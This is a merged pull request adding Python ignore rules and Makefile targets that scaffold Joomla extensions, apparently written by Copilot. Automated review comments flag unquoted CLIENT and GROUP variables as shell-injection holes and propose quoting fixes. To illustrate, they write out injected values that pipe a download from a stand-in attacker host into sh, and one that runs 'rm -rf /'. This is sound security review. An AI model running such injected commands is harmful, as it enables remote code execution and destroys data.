MokoConsulting/MokoCassiopeia
1
1
Fork 0
Code Issues 2 Pull Requests Actions Packages Releases 1 Activity

Improve Joomla development workflows and convert scripts to Python #31

Merged
Copilot merged 8 commits from copilot/improve-joomla-development-workflow into main 2026-01-04 05:34:19 +00:00
Conversation 6 Commits 8 Files Changed 19 +65 -1
4 changed files with 65 additions and 1 deletions
Download Patch File Download Diff File Expand all files Collapse all files
Showing only changes of commit 64f4b959f8 - Show all commits

30
.gitignore vendored
View File

@@ -793,6 +793,36 @@ package-lock.json
.phpunit.result.cache .phpunit.result.cache
codeception.phar codeception.phar
# Python
__pycache__/
*.py[cod]
*$py.class
*.so
.Python
build/
develop-eggs/
downloads/
eggs/
.eggs/
lib/
lib64/
parts/
sdist/
var/
wheels/
*.egg-info/
.installed.cfg
*.egg
MANIFEST
.pytest_cache/
.coverage
.coverage.*
htmlcov/
.tox/
.nox/
*.cover
.hypothesis/
# ============================================================ # ============================================================
# Keep-empty folders helper # Keep-empty folders helper
# ============================================================ # ============================================================

36
Makefile
View File

@@ -179,8 +179,42 @@ list-scripts:
@echo "Available fix scripts:" @echo "Available fix scripts:"
@find scripts/fix -type f -name "*.sh" -exec basename {} \; | sort @find scripts/fix -type f -name "*.sh" -exec basename {} \; | sort
@echo "" @echo ""
@echo "Available run scripts:" @echo "Available run scripts (bash):"
@find scripts/run -type f -name "*.sh" -exec basename {} \; | sort @find scripts/run -type f -name "*.sh" -exec basename {} \; | sort
@echo ""
@echo "Available run scripts (python):"
@find scripts/run -type f -name "*.py" -exec basename {} \; | sort
## scaffold: Create new Joomla extension scaffolding
scaffold:
@echo "Create new Joomla extension scaffolding"
@echo ""
@echo "Usage: make scaffold TYPE=<type> NAME=<name> AUTHOR=<author> DESC=<description>"
@echo ""
@echo "Types: component, module, plugin, template, package"
@echo ""
@echo "Example:"
@echo " make scaffold TYPE=module NAME='My Module' AUTHOR='John Doe' DESC='Module description'"
## scaffold-component: Create a component
scaffold-component:
@python3 scripts/run/scaffold_extension.py component "$(NAME)" "$(DESC)" "$(AUTHOR)"
## scaffold-module: Create a module
scaffold-module:
@python3 scripts/run/scaffold_extension.py module "$(NAME)" "$(DESC)" "$(AUTHOR)" --client $(CLIENT)
## scaffold-plugin: Create a plugin
scaffold-plugin:
@python3 scripts/run/scaffold_extension.py plugin "$(NAME)" "$(DESC)" "$(AUTHOR)" --group $(GROUP)
copilot-pull-request-reviewer[bot] commented 2026-01-04 05:38:48 +00:00 (Migrated from github.com)
Review
Copy Link

The 'scaffold-module' and 'scaffold-plugin' targets reference variables 'CLIENT' and 'GROUP' respectively, but these variables don't have default values. If a user runs these targets without specifying the variables (e.g., 'make scaffold-module NAME="Test"'), the command will pass empty values to the Python script. Consider adding default values (e.g., 'CLIENT ?= site' and 'GROUP ?= system') or documenting that these must be provided.

The 'scaffold-module' and 'scaffold-plugin' targets reference variables 'CLIENT' and 'GROUP' respectively, but these variables don't have default values. If a user runs these targets without specifying the variables (e.g., 'make scaffold-module NAME="Test"'), the command will pass empty values to the Python script. Consider adding default values (e.g., 'CLIENT ?= site' and 'GROUP ?= system') or documenting that these must be provided.
copilot-pull-request-reviewer[bot] commented 2026-01-04 05:38:51 +00:00 (Migrated from github.com)
Review
Copy Link

In the scaffold-module target, the $(CLIENT) variable is interpolated into the shell command without quoting (--client $(CLIENT)), which allows shell metacharacters in CLIENT to break out of the intended argument and execute arbitrary commands (e.g. CLIENT="site; curl https://attacker/... | sh"). If an attacker can influence CLIENT (via environment variables or make arguments in an automated context), running make scaffold-module results in remote code execution under the developer's account. Treat CLIENT as untrusted and ensure it is safely passed as data (for example by quoting it and avoiding any expansion that lets the shell interpret its contents as additional arguments or commands).

	@python3 scripts/run/scaffold_extension.py module "$(NAME)" "$(DESC)" "$(AUTHOR)" --client "$(CLIENT)"

## scaffold-plugin: Create a plugin
scaffold-plugin:
	@python3 scripts/run/scaffold_extension.py plugin "$(NAME)" "$(DESC)" "$(AUTHOR)" --group "$(GROUP)"
In the `scaffold-module` target, the `$(CLIENT)` variable is interpolated into the shell command without quoting (`--client $(CLIENT)`), which allows shell metacharacters in `CLIENT` to break out of the intended argument and execute arbitrary commands (e.g. `CLIENT="site; curl https://attacker/... | sh"`). If an attacker can influence `CLIENT` (via environment variables or `make` arguments in an automated context), running `make scaffold-module` results in remote code execution under the developer's account. Treat `CLIENT` as untrusted and ensure it is safely passed as data (for example by quoting it and avoiding any expansion that lets the shell interpret its contents as additional arguments or commands). ```suggestion @python3 scripts/run/scaffold_extension.py module "$(NAME)" "$(DESC)" "$(AUTHOR)" --client "$(CLIENT)" ## scaffold-plugin: Create a plugin scaffold-plugin: @python3 scripts/run/scaffold_extension.py plugin "$(NAME)" "$(DESC)" "$(AUTHOR)" --group "$(GROUP)" ```
copilot-pull-request-reviewer[bot] commented 2026-01-04 05:38:52 +00:00 (Migrated from github.com)
Review
Copy Link

In the scaffold-plugin target, the $(GROUP) variable is used unquoted in the shell command (--group $(GROUP)), so a malicious value containing shell metacharacters can inject extra arguments or commands (e.g. GROUP="system; rm -rf /"). If GROUP is influenced by external input (environment variables, wrapper scripts, or CI parameters), invoking make scaffold-plugin can lead to arbitrary command execution. Treat GROUP as untrusted input and ensure it is safely handled (for example by quoting it so the shell cannot interpret its contents beyond a single argument).

	@python3 scripts/run/scaffold_extension.py plugin "$(NAME)" "$(DESC)" "$(AUTHOR)" --group "$(GROUP)"
In the `scaffold-plugin` target, the `$(GROUP)` variable is used unquoted in the shell command (`--group $(GROUP)`), so a malicious value containing shell metacharacters can inject extra arguments or commands (e.g. `GROUP="system; rm -rf /"`). If `GROUP` is influenced by external input (environment variables, wrapper scripts, or CI parameters), invoking `make scaffold-plugin` can lead to arbitrary command execution. Treat `GROUP` as untrusted input and ensure it is safely handled (for example by quoting it so the shell cannot interpret its contents beyond a single argument). ```suggestion @python3 scripts/run/scaffold_extension.py plugin "$(NAME)" "$(DESC)" "$(AUTHOR)" --group "$(GROUP)" ```
## scaffold-template: Create a template
scaffold-template:
@python3 scripts/run/scaffold_extension.py template "$(NAME)" "$(DESC)" "$(AUTHOR)"
## scaffold-package: Create a package
scaffold-package:
@python3 scripts/run/scaffold_extension.py package "$(NAME)" "$(DESC)" "$(AUTHOR)"
## docs: Open documentation ## docs: Open documentation
docs: docs:

BIN
scripts/lib/__pycache__/common.cpython-312.pyc
View File

Binary file not shown.

BIN
scripts/lib/__pycache__/joomla_manifest.cpython-312.pyc
View File

Binary file not shown.